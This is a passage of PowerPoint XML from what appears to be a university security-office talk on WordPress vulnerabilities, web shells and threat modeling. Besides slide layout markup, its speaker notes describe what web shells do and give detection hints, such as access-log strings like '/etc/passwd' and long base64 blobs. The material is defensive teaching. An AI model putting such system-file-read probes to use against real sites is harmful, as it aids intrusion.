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5" r:id="rId1"/>
    <p:sldMasterId id="2147483656" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId4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Lst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Encode Sans Condensed Thin" panose="020B0604020202020204" charset="0"/>
      <p:bold r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId44"/>
      <p:bold r:id="rId45"/>
      <p:italic r:id="rId46"/>
      <p:boldItalic r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans ExtraBold" panose="020B0906030804020204" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId48"/>
      <p:boldItalic r:id="rId49"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Encode Sans" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId50"/>
      <p:bold r:id="rId51"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans SemiBold" panose="020B0706030804020204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId52"/>
      <p:bold r:id="rId53"/>
      <p:italic r:id="rId54"/>
      <p:boldItalic r:id="rId55"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34"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6" autoAdjust="0"/>
    <p:restoredTop sz="86385" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="144" d="100"/>
          <a:sy n="144" d="100"/>
        </p:scale>
        <p:origin x="276" y="126"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-1900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font" Target="fonts/font12.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7.fntdata"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font15.fntdata"/><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font9.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4.fntdata"/><Relationship Id="rId59"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2e42a9ea37_1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2e42a9ea37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b32e732821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b32e73282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 a few years, the CISO Office has let the WordPress user group know about vulnerabilities in themes in plugins we believe are likely to be used for UW sites. This slide lists vulnerability types and count for themes and plugins we brought to the attention of the group.</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b32e732821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b32e73282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 today's talk, I'm going to focus on one instance of something that can go wrong - attackers creating or leveraging website administrative functionality. The vulnerability types shown in red can provide an attacker with administrative capabilities.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a92c3325af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a92c3325a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Web shells are collections of programs and scripts that provide website administration functions.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a92c3325a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a92c3325a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Hide attacker communications, avoid detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Allow attackers to steal data, launch ransomware to extort website owners, extend access into the network.</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b2f2a3e46d_2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b2f2a3e46d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Simple web shell. What does this do? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Simple web shells are commonly used by highly skilled attackers.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b2f2a3e46d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b2f2a3e46d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b32e73282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b32e73282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b32e732821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b32e73282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What's happening here?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lots of tricks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a92c3325af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a92c3325af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After looking at what could go wrong, the third question is "What can you do about it?"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ab8fff5e8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ab8fff5e8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information security, there are two approaches for dealing with what could go wrong, prevention and detection. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If you can't prevent attackers from getting in, detecting when they do is the next best thing.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b32e732821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gb32e732821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b2f2a3e46d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b2f2a3e46d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you can't prevent attackers from getting in, detecting when they do is the next best thing. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Look for strings in access log entries like file or /etc/passwd. Look for POST involving files that should only be GET.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Monitor files on the site for modifications, both in content and in file permissions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Watch for the presence of commonly abused commands and very long strings. For the example we discussed previously, the base64-encoded string was almost 25,000 characters.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a9619bd786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a9619bd786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Pete  will step back from the web shell focus example to discuss the broader third question, "What are you going to do about it?"</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a92c3325af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a92c3325af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a9619bd786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a9619bd786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a9619bd786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a9619bd786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a9619bd786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a9619bd786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b291afa244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b291afa24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aa13cf8eeb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aa13cf8eeb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aa13cf8eeb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aa13cf8eeb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b277555434_1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b277555434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b30cc12d85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b30cc12d85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aa13cf8eeb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aa13cf8eeb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aa13cf8eeb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aa13cf8ee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b2f2a3e46d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b2f2a3e46d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b2f2a3e46d_1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b2f2a3e46d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a9619bd78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a9619bd78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a9619bd786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a9619bd78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a916fe7fa5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a916fe7fa5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a916fe7fa5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a916fe7fa5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513123bce5_1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513123bce5_1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e42a9ea37_1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2e42a9ea37_1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b30cc12d85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b30cc12d85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a92c3325af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a92c3325a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b30cc12d85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b30cc12d85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most secure computer is one that is never turned on. Once you do turn it on, you have to deal with the risk of operating the system. In information security, threat modeling is framework for identifying and managing risk. Lots of risk management frameworks, but I like to talk about this one because it is useful in everyday life as well as information security. It consists of three easy-to-remember steps.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a9619bd78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a9619bd78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b32e732821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b32e732821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Pretty straightforward, provide web content and interface with users.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a9619bd78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a9619bd78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Next question is "What could go wrong?" </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Omitting physical events like floods, earthquakes, power outages</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Focusing on malicious actions by humans</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Something goes wrong when a malicious actor exploits a vulnerability in the system. </a:t>
            </a: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4B2E83"/>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26725" y="734400"/>
            <a:ext cx="8395800" cy="2052600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="5000"/>
              <a:buFont typeface="Encode Sans Condensed Thin"/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans Condensed Thin"/>
                <a:ea typeface="Encode Sans Condensed Thin"/>
                <a:cs typeface="Encode Sans Condensed Thin"/>
                <a:sym typeface="Encode Sans Condensed Thin"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Google Shape;11;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="528325" y="2910325"/>
            <a:ext cx="1714500" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Google Shape;12;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645425" y="4350900"/>
            <a:ext cx="1177075" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Google Shape;13;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="502925" y="4837863"/>
            <a:ext cx="2129201" cy="14343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clusion">
  <p:cSld name="TITLE_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="4B2E83"/>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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426725" y="734400"/>
            <a:ext cx="8395800" cy="14799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3600"/>
              <a:buFont typeface="Encode Sans Condensed Thin"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans Condensed Thin"/>
                <a:ea typeface="Encode Sans Condensed Thin"/>
                <a:cs typeface="Encode Sans Condensed Thin"/>
                <a:sym typeface="Encode Sans Condensed Thin"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Google Shape;16;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="528325" y="2235300"/>
            <a:ext cx="1714500" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Google Shape;17;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645425" y="4350900"/>
            <a:ext cx="1177075" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Google Shape;18;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="502925" y="4837863"/>
            <a:ext cx="2129201" cy="143437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;19;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502925" y="2494525"/>
            <a:ext cx="8173800" cy="6129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2400"/>
              <a:buFont typeface="Encode Sans"/>
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans"/>
                <a:ea typeface="Encode Sans"/>
                <a:cs typeface="Encode Sans"/>
                <a:sym typeface="Encode Sans"/>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Clr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Encode Sans Condensed Thin"/>
              <a:buNone/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans Condensed Thin"/>
                <a:ea typeface="Encode Sans Condensed Thin"/>
                <a:cs typeface="Encode Sans Condensed Thin"/>
                <a:sym typeface="Encode Sans Condensed Thin"/>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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-381000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="&gt;"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-355600">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="⎼"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="&gt;"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-330200">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="⎼"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Open Sans SemiBold"/>
              <a:buChar char="&gt;"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:latin typeface="Open Sans SemiBold"/>
                <a:ea typeface="Open Sans SemiBold"/>
                <a:cs typeface="Open Sans SemiBold"/>
                <a:sym typeface="Open Sans SemiBold"/>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gt;"/>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gt;"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Google Shape;23;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="426725" y="1061288"/>
            <a:ext cx="1019175" cy="47625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Google Shape;24;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6871400" y="4830450"/>
            <a:ext cx="1960901" cy="13207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4B2E83"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 29"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Google Shape;30;p6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426725" y="734400"/>
            <a:ext cx="8395800" cy="20526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5000"/>
              <a:buFont typeface="Encode Sans Condensed Thin"/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans Condensed Thin"/>
                <a:ea typeface="Encode Sans Condensed Thin"/>
                <a:cs typeface="Encode Sans Condensed Thin"/>
                <a:sym typeface="Encode Sans Condensed Thin"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Google Shape;31;p6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="528325" y="2910325"/>
            <a:ext cx="1714500" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Google Shape;32;p6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645425" y="4350900"/>
            <a:ext cx="1177075" cy="792600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Google Shape;33;p6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="502925" y="4837863"/>
            <a:ext cx="2129201" cy="14343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clusion">
  <p:cSld name="TITLE_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="4B2E83"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 34"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;35;p7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426725" y="734400"/>
            <a:ext cx="8395800" cy="14799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3600"/>
              <a:buFont typeface="Encode Sans Condensed Thin"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Encode Sans Condensed Thin"/>
                <a:ea typeface="Encode Sans Condensed Thin"/>
                <a:cs typeface="Encode Sans Condensed Thin"/>
                <a:sym typeface="Encode Sans Condensed Thin"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Google Shape;36;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="528325" y="2235300"/>
            <a:ext cx="1714500" cy="85725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
